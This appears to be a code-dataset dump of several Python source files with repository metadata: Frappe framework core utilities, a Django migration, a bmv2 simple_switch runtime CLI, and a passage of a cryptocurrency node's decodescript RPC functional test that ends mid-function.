	return get_file_items(os.path.join(os.path.dirname(get_module(app_name).__file__), "modules.txt"))
def get_all_apps(with_frappe=False, with_internal_apps=True, sites_path=None):
	"""Get list of all apps via `sites/apps.txt`."""
	if not sites_path:
		sites_path = local.sites_path
	apps = get_file_items(os.path.join(sites_path, "apps.txt"), raise_not_found=True)
	if with_internal_apps:
		# Site-private apps live in the site's own apps.txt (may be absent).
		apps.extend(get_file_items(os.path.join(local.site_path, "apps.txt")))
	if with_frappe:
		apps.insert(0, 'frappe')
	return apps
def get_installed_apps():
	"""Get list of installed apps in current site."""
	# NOTE(review): `flags` is a _dict proxy whose missing attributes resolve
	# to None, so the `True` default here only applies if attribute lookup
	# actually raises — confirm the intended behaviour of in_install_db.
	if getattr(flags, "in_install_db", True):
		return []
	installed = json.loads(db.get_global("installed_apps") or "[]")
	return installed
@whitelist()
def get_versions():
	"""Get versions of all installed apps.
	Example:
		{
			"frappe": {
				"title": "Frappe Framework",
				"version": "5.0.0"
			}
		}"""
	versions = {}
	for app in get_installed_apps():
		versions[app] = {
			"title": get_hooks("app_title", app_name=app),
			"description": get_hooks("app_description", app_name=app)
		}
		try:
			versions[app]["version"] = get_attr(app + ".__version__")
		except AttributeError:
			# App does not expose __version__ — report a placeholder.
			versions[app]["version"] = '0.0.1'
	return versions
def get_hooks(hook=None, default=None, app_name=None):
	"""Get hooks via `app/hooks.py`
	:param hook: Name of the hook. Will gather all hooks for this name and return as a list.
	:param default: Default if no hook found.
	:param app_name: Filter by app."""
	def load_app_hooks(app_name=None):
		# Collect hook values from each installed app's hooks.py module.
		hooks = {}
		for app in [app_name] if app_name else get_installed_apps():
			app = "frappe" if app=="webnotes" else app
			try:
				app_hooks = get_module(app + ".hooks")
			except ImportError:
				if local.flags.in_install_app:
					# if app is not installed while restoring,
					# skip it instead of failing the whole load
					# (previously this fell through to `raise` unconditionally)
					continue
				raise
			for key in dir(app_hooks):
				if not key.startswith("_"):
					append_hook(hooks, key, getattr(app_hooks, key))
		return hooks
	def append_hook(target, key, value):
		# Dict values merge recursively; everything else accumulates in a list.
		if isinstance(value, dict):
			target.setdefault(key, {})
			for inkey in value:
				append_hook(target[key], inkey, value[inkey])
		else:
			append_to_list(target, key, value)
	def append_to_list(target, key, value):
		target.setdefault(key, [])
		if not isinstance(value, list):
			value = [value]
		target[key].extend(value)
	if app_name:
		hooks = _dict(load_app_hooks(app_name))
	else:
		# Hooks for all apps are cached; recomputed only after clear_cache().
		hooks = _dict(cache().get_value("app_hooks", load_app_hooks))
	if hook:
		return hooks.get(hook) or (default if default is not None else [])
	else:
		return hooks
def setup_module_map():
	"""Rebuild map of all modules (internal)."""
	_cache = cache()
	# Try the cached maps first (only available once a DB is configured).
	if conf.db_name:
		local.app_modules = _cache.get_value("app_modules")
		local.module_app = _cache.get_value("module_app")
	if not local.app_modules:
		# Rebuild both maps: app -> [modules] and module -> app.
		local.module_app, local.app_modules = {}, {}
		for app in get_all_apps(True):
			if app=="webnotes": app="frappe"
			local.app_modules.setdefault(app, [])
			for module in get_module_list(app):
				module = scrub(module)
				local.module_app[module] = app
				local.app_modules[app].append(module)
		if conf.db_name:
			_cache.set_value("app_modules", local.app_modules)
			_cache.set_value("module_app", local.module_app)
def get_file_items(path, raise_not_found=False, ignore_empty_lines=True):
	"""Returns items from text file as a list. Ignores empty lines."""
	content = read_file(path, raise_not_found=raise_not_found)
	if content:
		# \ufeff is no-width-break, \u200b is no-width-space
		content = content.replace("\ufeff", "").replace("\u200b", "").strip()
		# When ignore_empty_lines is set, blank lines AND '#' comment lines
		# are both dropped; otherwise every line is returned verbatim.
		return [p.strip() for p in content.splitlines() if (not ignore_empty_lines) or (p.strip() and not p.startswith("#"))]
	else:
		return []
def get_file_json(path):
	"""Parse the JSON file at *path* and return the decoded object."""
	with open(path, 'r') as json_file:
		return json.load(json_file)
def read_file(path, raise_not_found=False):
	"""Open a file and return its content as Unicode."""
	from frappe.utils import cstr
	if os.path.exists(path):
		with open(path, "r") as f:
			return cstr(f.read())
	elif raise_not_found:
		raise IOError("{} Not Found".format(path))
	else:
		# Missing file is tolerated by default.
		return None
def get_attr(method_string):
	"""Get python method object from its name."""
	# Split "package.module.func" into module path and attribute name.
	modulename = '.'.join(method_string.split('.')[:-1])
	methodname = method_string.split('.')[-1]
	return getattr(get_module(modulename), methodname)
def call(fn, *args, **kwargs):
	"""Call *fn*, forwarding only the keyword arguments it accepts.
	Positional arguments are passed through unchanged; unknown keyword
	arguments are silently dropped.
	:param fn: Callable to invoke. May carry a precomputed `fnargs`
		attribute listing its accepted argument names."""
	if hasattr(fn, 'fnargs'):
		fnargs = fn.fnargs
	else:
		# inspect.getargspec was removed in Python 3.11; use getfullargspec
		# when available and fall back to getargspec on Python 2.
		spec = getattr(inspect, "getfullargspec", None) or inspect.getargspec
		fnargs = spec(fn)[0]
	newargs = {}
	for a in fnargs:
		if a in kwargs:
			newargs[a] = kwargs.get(a)
	return fn(*args, **newargs)
def make_property_setter(args, ignore_validate=False, validate_fields_for_doctype=True):
	"""Create a new **Property Setter** (for overriding DocType and DocField properties)."""
	args = _dict(args)
	ps = get_doc({
		'doctype': "Property Setter",
		'doctype_or_field': args.doctype_or_field or "DocField",
		'doc_type': args.doctype,
		'field_name': args.fieldname,
		'property': args.property,
		'value': args.value,
		'property_type': args.property_type or "Data",
		'__islocal': 1
	})
	ps.ignore_validate = ignore_validate
	ps.validate_fields_for_doctype = validate_fields_for_doctype
	ps.insert()
def import_doc(path, ignore_links=False, ignore_insert=False, insert=False):
	"""Import a file using Data Import Tool."""
	from frappe.core.page.data_import_tool import data_import_tool
	data_import_tool.import_doc(path, ignore_links=ignore_links, ignore_insert=ignore_insert, insert=insert)
def copy_doc(doc, ignore_no_copy=True):
    """Return a copy of the given document as a new, unsaved record.

    :param doc: Document object (or dict) to copy.
    :param ignore_no_copy: If True (default), fields flagged ``no_copy`` are
        copied as well; if False they are cleared on the copy and its children.
    """
    import copy

    def remove_no_copy_fields(d):
        # Clear values of fields flagged no_copy in the doctype meta.
        for df in d.meta.get("fields", {"no_copy": 1}):
            if hasattr(d, df.fieldname):
                d.set(df.fieldname, None)

    if not isinstance(doc, dict):
        d = doc.as_dict()
    else:
        d = doc

    newdoc = get_doc(copy.deepcopy(d))
    newdoc.name = None
    newdoc.set("__islocal", 1)
    # Reset ownership/audit/amendment fields so they are re-assigned on insert.
    newdoc.owner = None
    newdoc.creation = None
    newdoc.amended_from = None
    newdoc.amendment_date = None
    if not ignore_no_copy:
        remove_no_copy_fields(newdoc)

    # Child rows must also be detached and marked local.
    for d in newdoc.get_all_children():
        d.name = None
        d.parent = None
        d.set("__islocal", 1)
        d.owner = None
        d.creation = None
        if not ignore_no_copy:
            remove_no_copy_fields(d)

    return newdoc
def compare(val1, condition, val2):
    """Compare two values using `frappe.utils.compare`.

    :param val1: Left-hand value.
    :param condition: Comparison operator; one of:

    - "^"
    - "in"
    - "not in"
    - "="
    - "!="
    - ">"
    - "<"
    - ">="
    - "<="
    - "not None"
    - "None"

    :param val2: Right-hand value.
    """
    import frappe.utils
    return frappe.utils.compare(val1, condition, val2)
def respond_as_web_page(title, html, success=None, http_status_code=None):
    """Send response as a web page with a message rather than JSON. Used to show permission errors etc.

    :param title: Page title and heading.
    :param html: Message (HTML) to be shown.
    :param success: Alert message.
    :param http_status_code: HTTP status code."""
    local.message_title = title
    local.message = html
    local.message_success = success
    # Route the response through the "message" page renderer.
    local.response['type'] = 'page'
    local.response['page_name'] = 'message'
    if http_status_code:
        local.response['http_status_code'] = http_status_code
def build_match_conditions(doctype, as_condition=True):
    """Return match (User permissions) for given doctype as list or SQL.

    :param doctype: DocType to build the conditions for.
    :param as_condition: If True, return an SQL condition string; otherwise a list.
    """
    import frappe.desk.reportview
    return frappe.desk.reportview.build_match_conditions(doctype, as_condition)
def get_list(doctype, *args, **kwargs):
    """List database query via `frappe.model.db_query`. Will also check for permissions.

    :param doctype: DocType on which query is to be made.
    :param fields: List of fields or `*`.
    :param filters: List of filters (see example).
    :param order_by: Order By e.g. `modified desc`.
    :param limit_page_start: Start results at record #. Default 0.
    :param limit_page_length: No of records in the page. Default 20.

    Example usage:

        # simple dict filter
        frappe.get_list("ToDo", fields=["name", "description"], filters = {"owner":"test@example.com"})

        # filter as a list of lists
        frappe.get_list("ToDo", fields="*", filters = [["modified", ">", "2014-01-01"]])

        # filter as a list of dicts
        frappe.get_list("ToDo", fields="*", filters = {"description": ("like", "test%")})
    """
    import frappe.model.db_query
    return frappe.model.db_query.DatabaseQuery(doctype).execute(None, *args, **kwargs)
def get_all(doctype, *args, **kwargs):
    """List database query via `frappe.model.db_query`. Will **not** check for conditions.
    Parameters are same as `frappe.get_list`

    :param doctype: DocType on which query is to be made.
    :param fields: List of fields or `*`. Default is: `["name"]`.
    :param filters: List of filters (see example).
    :param order_by: Order By e.g. `modified desc`.
    :param limit_page_start: Start results at record #. Default 0.
    :param limit_page_length: No of records in the page. Default 20.

    Example usage:

        # simple dict filter
        frappe.get_all("ToDo", fields=["name", "description"], filters = {"owner":"test@example.com"})

        # filter as a list of lists
        frappe.get_all("ToDo", fields=["*"], filters = [["modified", ">", "2014-01-01"]])

        # filter as a list of dicts
        frappe.get_all("ToDo", fields=["*"], filters = {"description": ("like", "test%")})
    """
    # Force permission bypass, then delegate to get_list.
    kwargs["ignore_permissions"] = True
    return get_list(doctype, *args, **kwargs)
def add_version(doc):
    """Insert a new **Version** of the given document.

    A **Version** is a JSON dump of the current document state.

    :param doc: Document whose current state should be versioned.
    """
    get_doc({
        "doctype": "Version",
        "ref_doctype": doc.doctype,
        "docname": doc.name,
        "doclist_json": json.dumps(doc.as_dict(), indent=1, sort_keys=True)
    }).insert(ignore_permissions=True)
def get_test_records(doctype):
    """Returns list of objects from `test_records.json` in the given doctype's folder.

    Returns an empty list if the file does not exist.

    :param doctype: DocType whose test records should be loaded.
    """
    from frappe.modules import get_doctype_module, get_module_path
    path = os.path.join(get_module_path(get_doctype_module(doctype)), "doctype", scrub(doctype), "test_records.json")
    if os.path.exists(path):
        with open(path, "r") as f:
            return json.loads(f.read())
    else:
        return []
def format_value(value, df, doc=None, currency=None):
    """Format value with given field properties.

    :param value: Value to be formatted.
    :param df: DocField object with properties `fieldtype`, `options` etc.
    :param doc: Optional parent document, passed through to the formatter.
    :param currency: Optional currency, passed through to the formatter.
    """
    import frappe.utils.formatters
    return frappe.utils.formatters.format_value(value, df, doc, currency=currency)
def get_print_format(doctype, name, print_format=None, style=None, as_pdf=False):
    """Get Print Format for given document.

    :param doctype: DocType of document.
    :param name: Name of document.
    :param print_format: Print Format name. Default 'Standard',
    :param style: Print Format style.
    :param as_pdf: Return as PDF. Default False."""
    from frappe.website.render import build_page
    from frappe.utils.pdf import get_pdf
    # The "print" page renderer reads its inputs from local.form_dict.
    local.form_dict.doctype = doctype
    local.form_dict.name = name
    local.form_dict.format = print_format
    local.form_dict.style = style
    html = build_page("print")
    if as_pdf:
        return get_pdf(html)
    else:
        return html
def attach_print(doctype, name, file_name):
    """Return a print of the document as an attachment dict (``fname``/``fcontent``).

    Honors the "Print Settings" single: returns a PDF when
    ``send_print_as_pdf`` is set, HTML (utf-8 encoded) otherwise.

    :param doctype: DocType of the document to print.
    :param name: Name of the document to print.
    :param file_name: Base file name for the attachment (extension is appended).
    """
    from frappe.utils import scrub_urls
    print_settings = db.get_singles_dict("Print Settings")
    if int(print_settings.send_print_as_pdf or 0):
        return {
            "fname": file_name + ".pdf",
            "fcontent": get_print_format(doctype, name, as_pdf=True)
        }
    else:
        return {
            "fname": file_name + ".html",
            "fcontent": scrub_urls(get_print_format(doctype, name)).encode("utf-8")
        }
# Module-level guard so logging configuration runs at most once per process.
logging_setup_complete = False

def get_logger(module=None):
    """Return a logger for the given module name (default "frappe"),
    configuring frappe logging on first use."""
    from frappe.setup_logging import setup_logging
    global logging_setup_complete
    if not logging_setup_complete:
        setup_logging()
        logging_setup_complete = True
    return logging.getLogger(module or "frappe")
| 31.181918
| 176
| 0.726292
|
4a0233a885c3b910e3ba1f8dc27a8042869ff1ec
| 297
|
py
|
Python
|
MFAEngine/apps/api/migrations/0015_delete_tokenconfig.py
|
justicevR/mfa_authentication_factor_v0.1
|
b7302904c3eaa00801ca4d78fb47797b16427ad4
|
[
"MIT"
] | null | null | null |
MFAEngine/apps/api/migrations/0015_delete_tokenconfig.py
|
justicevR/mfa_authentication_factor_v0.1
|
b7302904c3eaa00801ca4d78fb47797b16427ad4
|
[
"MIT"
] | null | null | null |
MFAEngine/apps/api/migrations/0015_delete_tokenconfig.py
|
justicevR/mfa_authentication_factor_v0.1
|
b7302904c3eaa00801ca4d78fb47797b16427ad4
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-09-08 11:44
from django.db import migrations
class Migration(migrations.Migration):
    # Removes the obsolete TokenConfig model from the api app.

    dependencies = [
        ('api', '0014_userenrolled_secret'),
    ]

    operations = [
        migrations.DeleteModel(
            name='TokenConfig',
        ),
    ]
| 17.470588
| 47
| 0.606061
|
4a02349e8e027865efbbd9c70adac43480b8f78d
| 2,536
|
py
|
Python
|
controller/simple_switch_api.py
|
gustavo978/helpful
|
59e3fd062cff4451c9bf8268df78a24f93ff67b7
|
[
"Unlicense"
] | null | null | null |
controller/simple_switch_api.py
|
gustavo978/helpful
|
59e3fd062cff4451c9bf8268df78a24f93ff67b7
|
[
"Unlicense"
] | null | null | null |
controller/simple_switch_api.py
|
gustavo978/helpful
|
59e3fd062cff4451c9bf8268df78a24f93ff67b7
|
[
"Unlicense"
] | 2
|
2018-06-06T14:10:23.000Z
|
2020-04-07T17:20:55.000Z
|
import runtime_CLI
import argparse
import cmd
import os
import sys
import struct
import json
import bmpy_utils as utils
from sswitch_runtime import SimpleSwitch
from scapy.all import *
from functools import wraps
import bmpy_utils as utils
from bm_runtime.standard import Standard
from bm_runtime.standard.ttypes import *
try:
from bm_runtime.simple_pre import SimplePre
except:
pass
try:
from bm_runtime.simple_pre_lag import SimplePreLAG
except:
pass
class SimpleSwitchAPI(runtime_CLI.RuntimeAPI):
    # Runtime CLI extended with simple_switch-specific thrift calls: egress
    # queue depth/rate control, mirroring mappings, and switch clock queries.
    # NOTE: the do_* docstrings double as the cmd module's help text, so they
    # are kept exactly as-is.

    @staticmethod
    def get_thrift_services():
        # Extra thrift service needed on top of the standard runtime services.
        return [("simple_switch", SimpleSwitch.Client)]

    def __init__(self, pre_type, standard_client, mc_client, sswitch_client):
        # NOTE(review): RuntimeAPI.__init__ returns None, so self.cli is
        # effectively None here — kept as-is to preserve behavior.
        self.cli = runtime_CLI.RuntimeAPI.__init__(self, pre_type,
                                                   standard_client, mc_client)
        self.sswitch_client = sswitch_client

    def do_set_queue_depth(self, line):
        "Set depth of one / all egress queue(s): set_queue_depth <nb_pkts> [<egress_port>]"
        args = line.split()
        depth = int(args[0])
        if len(args) > 1:
            # A port was given: set only that egress queue.
            port = int(args[1])
            self.sswitch_client.set_egress_queue_depth(port, depth)
        else:
            self.sswitch_client.set_all_egress_queue_depths(depth)

    def do_set_queue_rate(self, line):
        "Set rate of one / all egress queue(s): set_queue_rate <rate_pps> [<egress_port>]"
        args = line.split()
        rate = int(args[0])
        if len(args) > 1:
            # A port was given: set only that egress queue.
            port = int(args[1])
            self.sswitch_client.set_egress_queue_rate(port, rate)
        else:
            self.sswitch_client.set_all_egress_queue_rates(rate)

    def do_mirroring_add(self, line):
        "Add mirroring mapping: mirroring_add <mirror_id> <egress_port>"
        args = line.split()
        mirror_id, egress_port = int(args[0]), int(args[1])
        self.sswitch_client.mirroring_mapping_add(mirror_id, egress_port)

    def do_mirroring_delete(self, line):
        "Delete mirroring mapping: mirroring_delete <mirror_id>"
        mirror_id = int(line)
        self.sswitch_client.mirroring_mapping_delete(mirror_id)

    def do_get_time_elapsed(self, line):
        "Get time elapsed (in microseconds) since the switch started: get_time_elapsed"
        # Python 2 print statement — this file targets Python 2.
        print self.sswitch_client.get_time_elapsed_us()

    def do_get_time_since_epoch(self, line):
        "Get time elapsed (in microseconds) since the switch clock's epoch: get_time_since_epoch"
        print self.sswitch_client.get_time_since_epoch_us()
| 33.813333
| 97
| 0.693218
|
4a0234d78e4fb8791fe204b48e86336401c039cd
| 16,762
|
py
|
Python
|
test/functional/rpc_decodescript.py
|
bitcoin-rush/bitcoinrush
|
4329a6a7b9ce7a2188225f4abfc307e68de7dae0
|
[
"MIT"
] | null | null | null |
test/functional/rpc_decodescript.py
|
bitcoin-rush/bitcoinrush
|
4329a6a7b9ce7a2188225f4abfc307e68de7dae0
|
[
"MIT"
] | null | null | null |
test/functional/rpc_decodescript.py
|
bitcoin-rush/bitcoinrush
|
4329a6a7b9ce7a2188225f4abfc307e68de7dae0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test decoding scripts via decodescript RPC command."""
from test_framework.messages import CTransaction, sha256
from test_framework.test_framework import BitcoinrushTestFramework
from test_framework.util import assert_equal, bytes_to_hex_str, hex_str_to_bytes
from io import BytesIO
class DecodeScriptTest(BitcoinrushTestFramework):
    """Functional test for the `decodescript` RPC (and the shared "asm" decoding
    used by `decoderawtransaction`), covering all standard script types."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1

    def decodescript_script_sig(self):
        # Decode scriptSigs for each standard transaction type.
        signature = '304502207fa7a6d1e0ee81132a269ad84e68d695483745cde8b541e3bf630749894e342a022100c1f7ab20e13e22fb95281a870f3dcf38d782e53023ee313d741ad0cfbc0c509001'
        push_signature = '48' + signature
        public_key = '03b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb2'
        push_public_key = '21' + public_key

        # below are test cases for all of the standard transaction types

        # 1) P2PK scriptSig
        # the scriptSig of a public key scriptPubKey simply pushes a signature onto the stack
        rpc_result = self.nodes[0].decodescript(push_signature)
        assert_equal(signature, rpc_result['asm'])

        # 2) P2PKH scriptSig
        rpc_result = self.nodes[0].decodescript(push_signature + push_public_key)
        assert_equal(signature + ' ' + public_key, rpc_result['asm'])

        # 3) multisig scriptSig
        # this also tests the leading portion of a P2SH multisig scriptSig
        # OP_0 <A sig> <B sig>
        rpc_result = self.nodes[0].decodescript('00' + push_signature + push_signature)
        assert_equal('0 ' + signature + ' ' + signature, rpc_result['asm'])

        # 4) P2SH scriptSig
        # an empty P2SH redeemScript is valid and makes for a very simple test case.
        # thus, such a spending scriptSig would just need to pass the outer redeemScript
        # hash test and leave true on the top of the stack.
        rpc_result = self.nodes[0].decodescript('5100')
        assert_equal('1 0', rpc_result['asm'])

        # 5) null data scriptSig - no such thing because null data scripts can not be spent.
        # thus, no test case for that standard transaction type is here.

    def decodescript_script_pub_key(self):
        # Decode scriptPubKeys for each standard transaction type, including
        # the segwit ("asm") equivalents where they exist.
        public_key = '03b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb2'
        push_public_key = '21' + public_key
        public_key_hash = '5dd1d3a048119c27b28293056724d9522f26d945'
        push_public_key_hash = '14' + public_key_hash
        uncompressed_public_key = '04b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb25e01fc8fde47c96c98a4f3a8123e33a38a50cf9025cc8c4494a518f991792bb7'
        push_uncompressed_public_key = '41' + uncompressed_public_key
        p2wsh_p2pk_script_hash = 'd8590cf8ea0674cf3d49fd7ca249b85ef7485dea62c138468bddeb20cd6519f7'

        # below are test cases for all of the standard transaction types

        # 1) P2PK scriptPubKey
        # <pubkey> OP_CHECKSIG
        rpc_result = self.nodes[0].decodescript(push_public_key + 'ac')
        assert_equal(public_key + ' OP_CHECKSIG', rpc_result['asm'])
        # P2PK is translated to P2WPKH
        assert_equal('0 ' + public_key_hash, rpc_result['segwit']['asm'])

        # 2) P2PKH scriptPubKey
        # OP_DUP OP_HASH160 <PubKeyHash> OP_EQUALVERIFY OP_CHECKSIG
        rpc_result = self.nodes[0].decodescript('76a9' + push_public_key_hash + '88ac')
        assert_equal('OP_DUP OP_HASH160 ' + public_key_hash + ' OP_EQUALVERIFY OP_CHECKSIG', rpc_result['asm'])
        # P2PKH is translated to P2WPKH
        assert_equal('0 ' + public_key_hash, rpc_result['segwit']['asm'])

        # 3) multisig scriptPubKey
        # <m> <A pubkey> <B pubkey> <C pubkey> <n> OP_CHECKMULTISIG
        # just imagine that the pub keys used below are different.
        # for our purposes here it does not matter that they are the same even though it is unrealistic.
        multisig_script = '52' + push_public_key + push_public_key + push_public_key + '53ae'
        rpc_result = self.nodes[0].decodescript(multisig_script)
        assert_equal('2 ' + public_key + ' ' + public_key + ' ' + public_key + ' 3 OP_CHECKMULTISIG', rpc_result['asm'])
        # multisig in P2WSH
        multisig_script_hash = bytes_to_hex_str(sha256(hex_str_to_bytes(multisig_script)))
        assert_equal('0 ' + multisig_script_hash, rpc_result['segwit']['asm'])

        # 4) P2SH scriptPubKey
        # OP_HASH160 <Hash160(redeemScript)> OP_EQUAL.
        # push_public_key_hash here should actually be the hash of a redeem script.
        # but this works the same for purposes of this test.
        rpc_result = self.nodes[0].decodescript('a9' + push_public_key_hash + '87')
        assert_equal('OP_HASH160 ' + public_key_hash + ' OP_EQUAL', rpc_result['asm'])
        # P2SH does not work in segwit secripts. decodescript should not return a result for it.
        assert 'segwit' not in rpc_result

        # 5) null data scriptPubKey
        # use a signature look-alike here to make sure that we do not decode random data as a signature.
        # this matters if/when signature sighash decoding comes along.
        # would want to make sure that no such decoding takes place in this case.
        signature_imposter = '48304502207fa7a6d1e0ee81132a269ad84e68d695483745cde8b541e3bf630749894e342a022100c1f7ab20e13e22fb95281a870f3dcf38d782e53023ee313d741ad0cfbc0c509001'
        # OP_RETURN <data>
        rpc_result = self.nodes[0].decodescript('6a' + signature_imposter)
        assert_equal('OP_RETURN ' + signature_imposter[2:], rpc_result['asm'])

        # 6) a CLTV redeem script. redeem scripts are in-effect scriptPubKey scripts, so adding a test here.
        # OP_NOP2 is also known as OP_CHECKLOCKTIMEVERIFY.
        # just imagine that the pub keys used below are different.
        # for our purposes here it does not matter that they are the same even though it is unrealistic.
        #
        # OP_IF
        #   <receiver-pubkey> OP_CHECKSIGVERIFY
        # OP_ELSE
        #   <lock-until> OP_CHECKLOCKTIMEVERIFY OP_DROP
        # OP_ENDIF
        # <sender-pubkey> OP_CHECKSIG
        #
        # lock until block 500,000
        cltv_script = '63' + push_public_key + 'ad670320a107b17568' + push_public_key + 'ac'
        rpc_result = self.nodes[0].decodescript(cltv_script)
        assert_equal('OP_IF ' + public_key + ' OP_CHECKSIGVERIFY OP_ELSE 500000 OP_CHECKLOCKTIMEVERIFY OP_DROP OP_ENDIF ' + public_key + ' OP_CHECKSIG', rpc_result['asm'])
        # CLTV script in P2WSH
        cltv_script_hash = bytes_to_hex_str(sha256(hex_str_to_bytes(cltv_script)))
        assert_equal('0 ' + cltv_script_hash, rpc_result['segwit']['asm'])

        # 7) P2PK scriptPubKey
        # <pubkey> OP_CHECKSIG
        rpc_result = self.nodes[0].decodescript(push_uncompressed_public_key + 'ac')
        assert_equal(uncompressed_public_key + ' OP_CHECKSIG', rpc_result['asm'])
        # uncompressed pubkeys are invalid for checksigs in segwit scripts.
        # decodescript should not return a P2WPKH equivalent.
        assert 'segwit' not in rpc_result

        # 8) multisig scriptPubKey with an uncompressed pubkey
        # <m> <A pubkey> <B pubkey> <n> OP_CHECKMULTISIG
        # just imagine that the pub keys used below are different.
        # the purpose of this test is to check that a segwit script is not returned for bare multisig scripts
        # with an uncompressed pubkey in them.
        rpc_result = self.nodes[0].decodescript('52' + push_public_key + push_uncompressed_public_key +'52ae')
        assert_equal('2 ' + public_key + ' ' + uncompressed_public_key + ' 2 OP_CHECKMULTISIG', rpc_result['asm'])
        # uncompressed pubkeys are invalid for checksigs in segwit scripts.
        # decodescript should not return a P2WPKH equivalent.
        assert 'segwit' not in rpc_result

        # 9) P2WPKH scriptpubkey
        # 0 <PubKeyHash>
        rpc_result = self.nodes[0].decodescript('00' + push_public_key_hash)
        assert_equal('0 ' + public_key_hash, rpc_result['asm'])
        # segwit scripts do not work nested into each other.
        # a nested segwit script should not be returned in the results.
        assert 'segwit' not in rpc_result

        # 10) P2WSH scriptpubkey
        # 0 <ScriptHash>
        # even though this hash is of a P2PK script which is better used as bare P2WPKH, it should not matter
        # for the purpose of this test.
        rpc_result = self.nodes[0].decodescript('0020' + p2wsh_p2pk_script_hash)
        assert_equal('0 ' + p2wsh_p2pk_script_hash, rpc_result['asm'])
        # segwit scripts do not work nested into each other.
        # a nested segwit script should not be returned in the results.
        assert 'segwit' not in rpc_result

    def decoderawtransaction_asm_sighashtype(self):
        """Test decoding scripts via RPC command "decoderawtransaction".

        This test is in with the "decodescript" tests because they are testing the same "asm" script decodes.
        """

        # this test case uses a random plain vanilla mainnet transaction with a single P2PKH input and output
        tx = '0100000001696a20784a2c70143f634e95227dbdfdf0ecd51647052e70854512235f5986ca010000008a47304402207174775824bec6c2700023309a168231ec80b82c6069282f5133e6f11cbb04460220570edc55c7c5da2ca687ebd0372d3546ebc3f810516a002350cac72dfe192dfb014104d3f898e6487787910a690410b7a917ef198905c27fb9d3b0a42da12aceae0544fc7088d239d9a48f2828a15a09e84043001f27cc80d162cb95404e1210161536ffffffff0100e1f505000000001976a914eb6c6e0cdb2d256a32d97b8df1fc75d1920d9bca88ac00000000'
        rpc_result = self.nodes[0].decoderawtransaction(tx)
        assert_equal('304402207174775824bec6c2700023309a168231ec80b82c6069282f5133e6f11cbb04460220570edc55c7c5da2ca687ebd0372d3546ebc3f810516a002350cac72dfe192dfb[ALL] 04d3f898e6487787910a690410b7a917ef198905c27fb9d3b0a42da12aceae0544fc7088d239d9a48f2828a15a09e84043001f27cc80d162cb95404e1210161536', rpc_result['vin'][0]['scriptSig']['asm'])

        # this test case uses a mainnet transaction that has a P2SH input and both P2PKH and P2SH outputs.
        # it's from James D'Angelo's awesome introductory videos about multisig: https://www.youtube.com/watch?v=zIbUSaZBJgU and https://www.youtube.com/watch?v=OSA1pwlaypc
        # verify that we have not altered scriptPubKey decoding.
        tx = '01000000018d1f5635abd06e2c7e2ddf58dc85b3de111e4ad6e0ab51bb0dcf5e84126d927300000000fdfe0000483045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea01483045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75014c695221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53aeffffffff02611e0000000000001976a914dc863734a218bfe83ef770ee9d41a27f824a6e5688acee2a02000000000017a9142a5edea39971049a540474c6a99edf0aa4074c588700000000'
        rpc_result = self.nodes[0].decoderawtransaction(tx)
        assert_equal('8e3730608c3b0bb5df54f09076e196bc292a8e39a78e73b44b6ba08c78f5cbb0', rpc_result['txid'])
        assert_equal('0 3045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea[ALL] 3045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75[ALL] 5221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53ae', rpc_result['vin'][0]['scriptSig']['asm'])
        assert_equal('OP_DUP OP_HASH160 dc863734a218bfe83ef770ee9d41a27f824a6e56 OP_EQUALVERIFY OP_CHECKSIG', rpc_result['vout'][0]['scriptPubKey']['asm'])
        assert_equal('OP_HASH160 2a5edea39971049a540474c6a99edf0aa4074c58 OP_EQUAL', rpc_result['vout'][1]['scriptPubKey']['asm'])
        txSave = CTransaction()
        txSave.deserialize(BytesIO(hex_str_to_bytes(tx)))

        # make sure that a specifically crafted op_return value will not pass all the IsDERSignature checks and then get decoded as a sighash type
        tx = '01000000015ded05872fdbda629c7d3d02b194763ce3b9b1535ea884e3c8e765d42e316724020000006b48304502204c10d4064885c42638cbff3585915b322de33762598321145ba033fc796971e2022100bb153ad3baa8b757e30a2175bd32852d2e1cb9080f84d7e32fcdfd667934ef1b012103163c0ff73511ea1743fb5b98384a2ff09dd06949488028fd819f4d83f56264efffffffff0200000000000000000b6a0930060201000201000180380100000000001976a9141cabd296e753837c086da7a45a6c2fe0d49d7b7b88ac00000000'
        rpc_result = self.nodes[0].decoderawtransaction(tx)
        assert_equal('OP_RETURN 300602010002010001', rpc_result['vout'][0]['scriptPubKey']['asm'])

        # verify that we have not altered scriptPubKey processing even of a specially crafted P2PKH pubkeyhash and P2SH redeem script hash that is made to pass the der signature checks
